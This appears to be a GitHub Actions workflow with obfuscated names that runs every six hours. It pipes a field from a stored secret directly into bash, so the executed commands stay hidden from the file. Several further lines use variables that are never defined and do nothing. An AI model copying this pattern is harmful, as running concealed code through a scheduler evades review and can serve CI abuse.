name: jiaoluyouj
on:
  workflow_dispatch:
  schedule:
    - cron: '1 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiaoluyouj
        env:
          xcme7: ${{ secrets.xcme7 }}
        run: |
          echo $xcme7 | jq -r .ipc534 | /bin/bash
          echo $toqf32954 | jq -r .aconf6202 | /bin/bash
          echo $wut58 | jq -r .sxzk561 | /bin/bash
          echo $pk724 | jq -r .knmpr915 | /bin/bash
          echo $p2153 | jq -r .hdh199 | /bin/bash
          echo $k5 | jq -r .s1 | /bin/bash

